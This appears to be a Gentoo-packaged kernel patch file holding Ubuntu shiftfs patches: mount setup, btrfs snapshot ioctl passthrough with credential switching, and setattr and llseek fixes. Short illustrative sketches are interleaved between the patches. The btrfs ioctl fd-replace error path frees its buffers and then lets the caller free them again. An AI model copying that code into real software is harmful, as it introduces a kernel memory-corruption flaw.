++	if (info->mark || (info->mark != new.mark))
++		return -EPERM;
++
++	if (info->passthrough != new.passthrough) {
++		/* Don't allow exceeding passthrough options of mark mount. */
++		if (!passthrough_is_subset(info->info_mark->passthrough,
++					   info->passthrough))
++			return -EPERM;
++
++		info->passthrough = new.passthrough;
++	}
++
++	return 0;
++}
+ 
+-	err = -EPERM;
++static const struct super_operations shiftfs_super_ops = {
++	.put_super	= shiftfs_put_super,
++	.show_options	= shiftfs_show_options,
++	.statfs		= shiftfs_statfs,
++	.remount_fs	= shiftfs_remount,
++	.evict_inode	= shiftfs_evict_inode,
++};
++
++struct shiftfs_data {
++	void *data;
++	const char *path;
++};
++
++static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
++			      int silent)
++{
++	int err;
++	struct path path = {};
++	struct shiftfs_super_info *sbinfo_mp;
++	char *name = NULL;
++	struct inode *inode = NULL;
++	struct dentry *dentry = NULL;
++	struct shiftfs_data *data = raw_data;
++	struct shiftfs_super_info *sbinfo = NULL;
++
++	if (!data->path)
++		return -EINVAL;
++
++	sb->s_fs_info = kzalloc(sizeof(*sbinfo), GFP_KERNEL);
++	if (!sb->s_fs_info)
++		return -ENOMEM;
++	sbinfo = sb->s_fs_info;
++
++	err = shiftfs_parse_mount_options(sbinfo, data->data);
++	if (err)
++		return err;
++
++	/* to mount a mark, must be userns admin */
++	if (!sbinfo->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
++		return -EPERM;
++
++	name = kstrdup(data->path, GFP_KERNEL);
++	if (!name)
++		return -ENOMEM;
++
++	err = kern_path(name, LOOKUP_FOLLOW, &path);
++	if (err)
++		goto out_free_name;
+ 
+ 	if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
+ 		err = -ENOTDIR;
+-		goto out_put;
++		goto out_put_path;
+ 	}
+ 
+-	sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
+-	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
+-		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
+-		err = -EINVAL;
+-		goto out_put;
+-	}
++	if (sbinfo->mark) {
++		struct super_block *lower_sb = path.mnt->mnt_sb;
++
++		/* to mark a mount point, must be root wrt lower s_user_ns */
++		if (!ns_capable(lower_sb->s_user_ns, CAP_SYS_ADMIN)) {
++			err = -EPERM;
++			goto out_put_path;
++		}
+ 
+-	if (ssi->mark) {
+ 		/*
+ 		 * this part is visible unshifted, so make sure no
+ 		 * executables that could be used to give suid
+ 		 * privileges
+ 		 */
+ 		sb->s_iflags = SB_I_NOEXEC;
+-		ssi->mnt = path.mnt;
+-		dentry = path.dentry;
+-	} else {
+-		struct shiftfs_super_info *mp_ssi;
+ 
+ 		/*
+-		 * this leg executes if we're admin capable in
+-		 * the namespace, so be very careful
++		 * Handle nesting of shiftfs mounts by referring this mark
++		 * mount back to the original mark mount. This is more
++		 * efficient and alleviates concerns about stack depth.
+ 		 */
++		if (lower_sb->s_magic == SHIFTFS_MAGIC) {
++			sbinfo_mp = lower_sb->s_fs_info;
++
++			/* Doesn't make sense to mark a mark mount */
++			if (sbinfo_mp->mark) {
++				err = -EINVAL;
++				goto out_put_path;
++			}
++
++			if (!passthrough_is_subset(sbinfo_mp->passthrough,
++						   sbinfo->passthrough)) {
++				err = -EPERM;
++				goto out_put_path;
++			}
++
++			sbinfo->mnt = mntget(sbinfo_mp->mnt);
++			dentry = dget(path.dentry->d_fsdata);
++		} else {
++			sbinfo->mnt = mntget(path.mnt);
++			dentry = dget(path.dentry);
++		}
++
++		sbinfo->creator_cred = prepare_creds();
++		if (!sbinfo->creator_cred) {
++			err = -ENOMEM;
++			goto out_put_path;
++		}
++	} else {
++		/*
++		 * This leg executes if we're admin capable in the namespace,
++		 * so be very careful.
++		 */
++		err = -EPERM;
+ 		if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
+-			goto out_put;
+-		mp_ssi = path.dentry->d_sb->s_fs_info;
+-		if (!mp_ssi->mark)
+-			goto out_put;
+-		ssi->mnt = mntget(mp_ssi->mnt);
++			goto out_put_path;
++
++		sbinfo_mp = path.dentry->d_sb->s_fs_info;
++		if (!sbinfo_mp->mark)
++			goto out_put_path;
++
++		if (!passthrough_is_subset(sbinfo_mp->passthrough,
++					   sbinfo->passthrough))
++			goto out_put_path;
++
++		sbinfo->mnt = mntget(sbinfo_mp->mnt);
++		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
+ 		dentry = dget(path.dentry->d_fsdata);
+-		path_put(&path);
++		sbinfo->info_mark = sbinfo_mp;
++	}
++
++	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
++	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
++		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
++		err = -EINVAL;
++		goto out_put_path;
++	}
++
++	inode = new_inode(sb);
++	if (!inode) {
++		err = -ENOMEM;
++		goto out_put_path;
+ 	}
+-	ssi->userns = get_user_ns(dentry->d_sb->s_user_ns);
+-	sb->s_fs_info = ssi;
++	shiftfs_fill_inode(inode, dentry->d_inode->i_ino, S_IFDIR, 0, dentry);
++
++	ihold(dentry->d_inode);
++	inode->i_private = dentry->d_inode;
++
+ 	sb->s_magic = SHIFTFS_MAGIC;
+ 	sb->s_op = &shiftfs_super_ops;
+ 	sb->s_xattr = shiftfs_xattr_handlers;
+ 	sb->s_d_op = &shiftfs_dentry_ops;
+-	sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry));
++	sb->s_flags |= SB_POSIXACL;
++	sb->s_root = d_make_root(inode);
++	if (!sb->s_root) {
++		err = -ENOMEM;
++		goto out_put_path;
++	}
++
+ 	sb->s_root->d_fsdata = dentry;
++	sbinfo->userns = get_user_ns(dentry->d_sb->s_user_ns);
++	shiftfs_copyattr(dentry->d_inode, sb->s_root->d_inode);
+ 
+-	return 0;
++	dentry = NULL;
++	err = 0;
+ 
+- out_put:
++out_put_path:
+ 	path_put(&path);
+- out:
++
++out_free_name:
+ 	kfree(name);
+-	kfree(ssi);
++
++	dput(dentry);
++
+ 	return err;
+ }
+ 
+@@ -764,17 +1869,26 @@ static struct file_system_type shiftfs_type = {
+ 
+ static int __init shiftfs_init(void)
+ {
++	shiftfs_file_info_cache = kmem_cache_create(
++		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
++		SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
++	if (!shiftfs_file_info_cache)
++		return -ENOMEM;
++
+ 	return register_filesystem(&shiftfs_type);
+ }
+ 
+ static void __exit shiftfs_exit(void)
+ {
+ 	unregister_filesystem(&shiftfs_type);
++	kmem_cache_destroy(shiftfs_file_info_cache);
+ }
+ 
+ MODULE_ALIAS_FS("shiftfs");
+ MODULE_AUTHOR("James Bottomley");
+-MODULE_DESCRIPTION("uid/gid shifting bind filesystem");
++MODULE_AUTHOR("Seth Forshee <seth.forshee@canonical.com>");
++MODULE_AUTHOR("Christian Brauner <christian.brauner@ubuntu.com>");
++MODULE_DESCRIPTION("id shifting filesystem");
+ MODULE_LICENSE("GPL v2");
+ module_init(shiftfs_init)
+ module_exit(shiftfs_exit)
+-- 
+2.39.2
+
+From a2e0843dcd21746dfc23df95ab8c93af942fac6b Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Thu, 4 Apr 2019 15:39:13 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support some btrfs ioctls
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1823186
+
+Shiftfs currently only passes through a few ioctl()s to the underlay. These
+are ioctl()s that are generally considered safe. Doing it for random
+ioctl()s would be a security issue. Permissions for ioctl()s are not
+checked before the filesystem gets involved, so if we were to override
+credentials we could, e.g., do a btrfs tree search in the underlay which
+we normally wouldn't be allowed to do.
+However, the btrfs filesystem allows unprivileged users to perform various
+operations through its ioctl() interface. With shiftfs these ioctl()s
+currently do not work. To not regress users that expect btrfs ioctl()s
+to work in unprivileged containers we can create a whitelist of
+ioctl()s that we allow to go through to the underlay and for which we
+also switch credentials.
+The main problem is how we switch credentials. Since permission checks
+for ioctl()s are done by the actual filesystem and not by the vfs, any
+additional capable(<cap>)-based checks done by the filesystem would
+unconditionally pass after we switch credentials. So to make credential
+switching safe we drop *all* capabilities when switching credentials.
+This means that only inode-based permission checks will pass.
+
+Btrfs also allows unprivileged users to delete snapshots when the
+filesystem is mounted with the user_subvol_rm_allowed mount option or
+if the caller is capable(CAP_SYS_ADMIN). The latter should never be the case
+with unprivileged users. To make sure we only allow removal of snapshots in
+the former case we drop all capabilities (see above) when switching
+credentials.
+
+Additionally, btrfs allows the creation of snapshots. To make this work we
+need to be (too) clever. When doing snapshots btrfs requires that an fd to
+the directory the snapshot is supposed to be created in be passed along.
+This fd obviously references a shiftfs file and as such a shiftfs dentry
+and inode. This will cause btrfs to yell EXDEV. To circumvent this
+problem we need to silently and temporarily replace the passed-in fd
+with an fd that refers to a file that references a btrfs dentry and
+inode.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 156 +++++++++++++++++++++++++++++++++++++++++++++++++--
+ 1 file changed, 151 insertions(+), 5 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index ad1ae5bce6c1..678cad30f4a5 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1,6 +1,8 @@
++#include <linux/btrfs.h>
+ #include <linux/capability.h>
+ #include <linux/cred.h>
+ #include <linux/mount.h>
++#include <linux/fdtable.h>
+ #include <linux/file.h>
+ #include <linux/fs.h>
+ #include <linux/namei.h>
+@@ -41,7 +43,21 @@ static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
+ 
+ #define SHIFTFS_PASSTHROUGH_NONE 0
+ #define SHIFTFS_PASSTHROUGH_STAT 1
+-#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT)
++#define SHIFTFS_PASSTHROUGH_IOCTL 2
++#define SHIFTFS_PASSTHROUGH_ALL                                                \
++	(SHIFTFS_PASSTHROUGH_STAT | SHIFTFS_PASSTHROUGH_IOCTL)
++
++static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
++{
++	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
++		return false;
++
++	if (info->info_mark &&
++	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
++		return false;
++
++	return true;
++}
+ 
+ static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
+ {
+@@ -1345,18 +1361,120 @@ static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
+ 	return shiftfs_revert_object_creds(oldcred, newcred);
+ }
+ 
++static inline bool is_btrfs_snap_ioctl(int cmd)
++{
++	if ((cmd == BTRFS_IOC_SNAP_CREATE) || (cmd == BTRFS_IOC_SNAP_CREATE_V2))
++		return true;
++
++	return false;
++}
++
++static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
++					  void __user *arg,
++					  struct btrfs_ioctl_vol_args *v1,
++					  struct btrfs_ioctl_vol_args_v2 *v2)
++{
++	int ret;
++
++	if (!is_btrfs_snap_ioctl(cmd))
++		return 0;
++
++	if (cmd == BTRFS_IOC_SNAP_CREATE)
++		ret = copy_to_user(arg, v1, sizeof(*v1));
++	else
++		ret = copy_to_user(arg, v2, sizeof(*v2));
++
++	fdput(lfd);
++	__close_fd(current->files, fd);
++	kfree(v1);
++	kfree(v2);
++
++	return ret;
++}
++
++static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
++					  struct btrfs_ioctl_vol_args **b1,
++					  struct btrfs_ioctl_vol_args_v2 **b2,
++					  struct fd *lfd,
++					  int *newfd)
++{
++	int oldfd, ret;
++	struct fd src;
++	struct btrfs_ioctl_vol_args *v1 = NULL;
++	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
++
++	if (!is_btrfs_snap_ioctl(cmd))
++		return 0;
++
++	if (cmd == BTRFS_IOC_SNAP_CREATE) {
++		v1 = memdup_user(arg, sizeof(*v1));
++		if (IS_ERR(v1))
++			return PTR_ERR(v1);
++		oldfd = v1->fd;
++		*b1 = v1;
++	} else {
++		v2 = memdup_user(arg, sizeof(*v2));
++		if (IS_ERR(v2))
++			return PTR_ERR(v2);
++		oldfd = v2->fd;
++		*b2 = v2;
++	}
++
++	src = fdget(oldfd);
++	if (!src.file)
++		return -EINVAL;
++
++	ret = shiftfs_real_fdget(src.file, lfd);
++	fdput(src);
++	if (ret)
++		return ret;
++
++	*newfd = get_unused_fd_flags(lfd->file->f_flags);
++	if (*newfd < 0) {
++		fdput(*lfd);
++		return *newfd;
++	}
++
++	fd_install(*newfd, lfd->file);
++
++	if (cmd == BTRFS_IOC_SNAP_CREATE) {
++		v1->fd = *newfd;
++		ret = copy_to_user(arg, v1, sizeof(*v1));
++		v1->fd = oldfd;
++	} else {
++		v2->fd = *newfd;
++		ret = copy_to_user(arg, v2, sizeof(*v2));
++		v2->fd = oldfd;
++	}
++
++	if (ret)
++		shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
++
++	return ret;
++}
++
+ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 			       unsigned long arg)
+ {
+-	long ret = 0;
+ 	struct fd lowerfd;
+ 	struct cred *newcred;
+ 	const struct cred *oldcred;
++	int newfd = -EBADF;
++	long err = 0, ret = 0;
++	void __user *argp = (void __user *)arg;
++	struct fd btrfs_lfd = {};
+ 	struct super_block *sb = file->f_path.dentry->d_sb;
++	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
++	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
++
++	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
++					     &btrfs_lfd, &newfd);
++	if (ret < 0)
++		return ret;
+ 
+ 	ret = shiftfs_real_fdget(file, &lowerfd);
+ 	if (ret)
+-		return ret;
++		goto out_restore;
+ 
+ 	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
+ 	if (ret)
+@@ -1372,9 +1490,33 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ out_fdput:
+ 	fdput(lowerfd);
+ 
++out_restore:
++	err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp,
++					     btrfs_v1, btrfs_v2);
++	if (!ret)
++		ret = err;
++
+ 	return ret;
+ }
+ 
++static bool in_ioctl_whitelist(int flag)
++{
++	switch (flag) {
++	case BTRFS_IOC_SNAP_CREATE:
++		return true;
++	case BTRFS_IOC_SNAP_CREATE_V2:
++		return true;
++	case BTRFS_IOC_SUBVOL_CREATE:
++		return true;
++	case BTRFS_IOC_SUBVOL_CREATE_V2:
++		return true;
++	case BTRFS_IOC_SNAP_DESTROY:
++		return true;
++	}
++
++	return false;
++}
++
+ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
+ 			  unsigned long arg)
+ {
+@@ -1386,7 +1528,9 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
+ 	case FS_IOC_SETFLAGS:
+ 		break;
+ 	default:
+-		return -ENOTTY;
++		if (!in_ioctl_whitelist(cmd) ||
++		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
++			return -ENOTTY;
+ 	}
+ 
+ 	return shiftfs_real_ioctl(file, cmd, arg);
+@@ -1403,7 +1547,9 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
+ 	case FS_IOC32_SETFLAGS:
+ 		break;
+ 	default:
+-		return -ENOIOCTLCMD;
++		if (!in_ioctl_whitelist(cmd) ||
++		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
++			return -ENOIOCTLCMD;
+ 	}
+ 
+ 	return shiftfs_real_ioctl(file, cmd, arg);
+-- 
+2.39.2
+
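+For illustration, a minimal sketch of the capability-dropping credential
+switch described above (helper name and shape are illustrative, not the
+exact shiftfs code):
+
+ #include <linux/capability.h>
+ #include <linux/cred.h>
+ #include <linux/err.h>
+
+ /*
+  * Sketch only: take a copy of the current credentials, clear every
+  * effective capability, and override. With the effective set empty,
+  * any capable() check in the lower filesystem fails and only
+  * inode-based permission checks can pass.
+  */
+ static const struct cred *override_creds_capless(struct cred **newcred)
+ {
+   struct cred *cred = prepare_creds();
+
+   if (!cred)
+     return ERR_PTR(-ENOMEM);
+   cap_clear(cred->cap_effective);
+   *newcred = cred;
+   return override_creds(cred); /* returns the previously active creds */
+ }
+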
+From 7e64c9484f2524943cde1164852c1888312c010f Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Thu, 11 Apr 2019 07:31:04 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use translated ids when changing lower
+ fs attrs
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1824350
+
+shiftfs_setattr() is preparing a new set of attributes with the
+owner translated for the lower fs, but it then passes the
+original attrs. As a result the owner is set to the untranslated
+owner, which causes the shiftfs inodes to also have incorrect
+ids. For example:
+
+ # mkdir dir
+ # touch file
+ # ls -lh dir file
+ drwxr-xr-x 2 root root 4.0K Apr 11 13:05 dir
+ -rw-r--r-- 1 root root 0 Apr 11 13:05 file
+ # chown 500:500 dir file
+ # ls -lh dir file
+ drwxr-xr-x 2 1000500 1000500 4.0K Apr 11 12:42 dir
+ -rw-r--r-- 1 1000500 1000500 0 Apr 11 12:42 file
+
+Fix this to pass the correct iattr struct to notify_change().
+
+Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 678cad30f4a5..e736fd6afcb4 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -779,7 +779,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 
+ 	inode_lock(loweri);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = notify_change(lowerd, attr, NULL);
++	err = notify_change(lowerd, &newattr, NULL);
+ 	revert_creds(oldcred);
+ 	inode_unlock(loweri);
+ 
+-- 
+2.39.2
+
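+For reference, the id translation applied above, isolated as a helper
+(a sketch; shiftfs open-codes this inside shiftfs_setattr()):
+
+ #include <linux/uidgid.h>
+ #include <linux/user_namespace.h>
+
+ /*
+  * Map a kernel uid into the shiftfs user namespace and reuse the
+  * resulting value as the kernel uid handed to the lower filesystem --
+  * the KUIDT_INIT(from_kuid(...)) pattern used by the fix.
+  */
+ static kuid_t shift_kuid_down(struct user_namespace *ns, kuid_t kuid)
+ {
+   return KUIDT_INIT(from_kuid(ns, kuid));
+ }
+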
+From 84e09374dce45b2aaec7e719acd209b1e5e4ae85 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Sat, 13 Apr 2019 14:41:01 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix passing of attrs to underlay for
+ setattr
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1824717
+
+shiftfs_setattr() makes a copy of the attrs it was given to pass
+to the lower fs. It then calls setattr_prepare() with the original
+attrs, and this may make changes which are not reflected in the
+attrs passed to the lower fs. To fix this, copy the attrs to the
+new struct for the lower fs after calling setattr_prepare().
+
+Additionally, notify_change() may have set ATTR_MODE when one of
+ATTR_KILL_S[UG]ID is set, and passing this combination on to the lower
+fs's notify_change() will trigger a BUG(). Do as overlayfs and
+ecryptfs both do, and clear ATTR_MODE if either of those bits
+is set.
+
+Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Marcelo Henrique Cerri <marcelo.cerri@canonical.com>
+Acked-by: Brad Figg <brad.figg@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index e736fd6afcb4..8e064756ea0c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -765,7 +765,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ {
+ 	struct dentry *lowerd = dentry->d_fsdata;
+ 	struct inode *loweri = lowerd->d_inode;
+-	struct iattr newattr = *attr;
++	struct iattr newattr;
+ 	const struct cred *oldcred;
+ 	struct super_block *sb = dentry->d_sb;
+ 	int err;
+@@ -774,9 +774,17 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 	if (err)
+ 		return err;
+ 
++	newattr = *attr;
+ 	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
+ 	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
+ 
++	/*
++	 * mode change is for clearing setuid/setgid bits. Allow lower fs
++	 * to interpret this in its own way.
++	 */
++	if (newattr.ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
++		newattr.ia_valid &= ~ATTR_MODE;
++
+ 	inode_lock(loweri);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+ 	err = notify_change(lowerd, &newattr, NULL);
+-- 
+2.39.2
+
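+The ATTR_MODE handling above, shown as a standalone sketch (the real
+change open-codes it in shiftfs_setattr()):
+
+ #include <linux/fs.h>
+
+ /*
+  * If the caller asked to kill setuid/setgid bits, drop ATTR_MODE so
+  * the lower filesystem interprets the kill flags itself; passing both
+  * to notify_change() would trigger a BUG().
+  */
+ static void sanitize_kill_bits(struct iattr *attr)
+ {
+   if (attr->ia_valid & (ATTR_KILL_SUID | ATTR_KILL_SGID))
+     attr->ia_valid &= ~ATTR_MODE;
+ }
+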
+From a3ba10b3019139566fa65c351966ca3482c90819 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Mon, 15 Apr 2019 15:21:55 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent use-after-free when verifying
+ mount options
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1824735
+
+Copy up the passthrough mount settings of the mark mount point to the
+shiftfs overlay.
+
+Before this commit we used to keep a reference to the shiftfs mark
+mount's shiftfs_super_info which was stashed in the superblock of the
+mark mount. The problem is that we only take a reference to the mount of
+the underlay, i.e. the filesystem that is *under* the shiftfs mark
+mount. This means when someone performs a shiftfs mark mount, then a
+shiftfs overlay mount and then immediately unmounts the shiftfs mark
+mount we muck with invalid memory since shiftfs_put_super might have
+already been called freeing that memory.
+
+Another solution would be to start reference counting. But this would be
+overkill. We only care about the passthrough mount option of the mark
+mount. And we only need it to verify that on remount the new passthrough
+options of the shiftfs overlay are a subset of the mark mount's
+passthrough options. In other scenarios we don't care. So copying up is
+good enough and also only needs to happen once on mount, i.e. when a new
+superblock is created and the .fill_super method is called.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 29 ++++++++++++++++++-----------
+ 1 file changed, 18 insertions(+), 11 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 8e064756ea0c..4c8a6ec2a617 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -28,7 +28,7 @@ struct shiftfs_super_info {
+ 	const struct cred *creator_cred;
+ 	bool mark;
+ 	unsigned int passthrough;
+-	struct shiftfs_super_info *info_mark;
++	unsigned int passthrough_mark;
+ };
+ 
+ struct shiftfs_file_info {
+@@ -52,10 +52,6 @@ static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
+ 	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
+ 		return false;
+ 
+-	if (info->info_mark &&
+-	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
+-		return false;
+-
+ 	return true;
+ }
+ 
+@@ -64,10 +60,6 @@ static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
+ 	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
+ 		return false;
+ 
+-	if (info->info_mark &&
+-	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT))
+-		return false;
+-
+ 	return true;
+ }
+ 
+@@ -1824,7 +1816,7 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
+ 
+ 	if (info->passthrough != new.passthrough) {
+ 		/* Don't allow exceeding passthrough options of mark mount. */
+-		if (!passthrough_is_subset(info->info_mark->passthrough,
++		if (!passthrough_is_subset(info->passthrough_mark,
+ 					   info->passthrough))
+ 			return -EPERM;
+ 
+@@ -1926,9 +1918,19 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 
+ 			sbinfo->mnt = mntget(sbinfo_mp->mnt);
+ 			dentry = dget(path.dentry->d_fsdata);
++			/*
++			 * Copy up the passthrough mount options from the
++			 * parent mark mountpoint.
++			 */
++			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
+ 		} else {
+ 			sbinfo->mnt = mntget(path.mnt);
+ 			dentry = dget(path.dentry);
++			/*
++			 * For a new mark passthrough_mark and passthrough
++			 * are identical.
++			 */
++			sbinfo->passthrough_mark = sbinfo->passthrough;
+ 		}
+ 
+ 		sbinfo->creator_cred = prepare_creds();
+@@ -1956,7 +1958,12 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		sbinfo->mnt = mntget(sbinfo_mp->mnt);
+ 		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
+ 		dentry = dget(path.dentry->d_fsdata);
+-		sbinfo->info_mark = sbinfo_mp;
++		/*
++		 * Copy up passthrough settings from mark mountpoint so we can
++		 * verify when the overlay wants to remount with different
++		 * passthrough settings.
++		 */
++		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
+ 	}
+ 
+ 	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
+-- 
+2.39.2
+
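+The subset rule relied on above can be pictured as a simple bitmask
+check (a sketch; passthrough_is_subset() in shiftfs may differ in
+detail):
+
+ /*
+  * New passthrough flags are acceptable only if they enable nothing
+  * beyond what the mark mount already allowed.
+  */
+ static inline bool flags_are_subset(unsigned int old_flags,
+                                     unsigned int new_flags)
+ {
+   return (new_flags & ~old_flags) == 0;
+ }
+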
+From a6ec1bf679d71f552f3eee7bf2b5458a6ea71e9a Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Tue, 16 Apr 2019 18:29:00 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use separate llseek method for
+ directories
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1824812
+
+Give shiftfs its own proper llseek method for directories.
+
+Before this commit both directories and regular files relied on an
+llseek method that was targeted at regular files.
+However, the realfile's f_pos was not correctly handled when userspace
+called lseek(2) on a shiftfs directory file. Give directories their
+own llseek operation so that seeking on a directory file is properly
+supported.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 14 +++++++++++---
+ 1 file changed, 11 insertions(+), 3 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 4c8a6ec2a617..9771165d1ce0 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1144,7 +1144,15 @@ static int shiftfs_release(struct inode *inode, struct file *file)
+ 	return 0;
+ }
+ 
+-static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence)
++static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
++{
++	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile = file_info->realfile;
++
++	return vfs_llseek(realfile, offset, whence);
++}
++
++static loff_t shiftfs_file_llseek(struct file *file, loff_t offset, int whence)
+ {
+ 	struct inode *realinode = file_inode(file)->i_private;
+ 
+@@ -1653,7 +1661,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
+ const struct file_operations shiftfs_file_operations = {
+ 	.open			= shiftfs_open,
+ 	.release		= shiftfs_release,
+-	.llseek			= shiftfs_llseek,
++	.llseek			= shiftfs_file_llseek,
+ 	.read_iter		= shiftfs_read_iter,
+ 	.write_iter		= shiftfs_write_iter,
+ 	.fsync			= shiftfs_fsync,
+@@ -1670,7 +1678,7 @@ const struct file_operations shiftfs_dir_operations = {
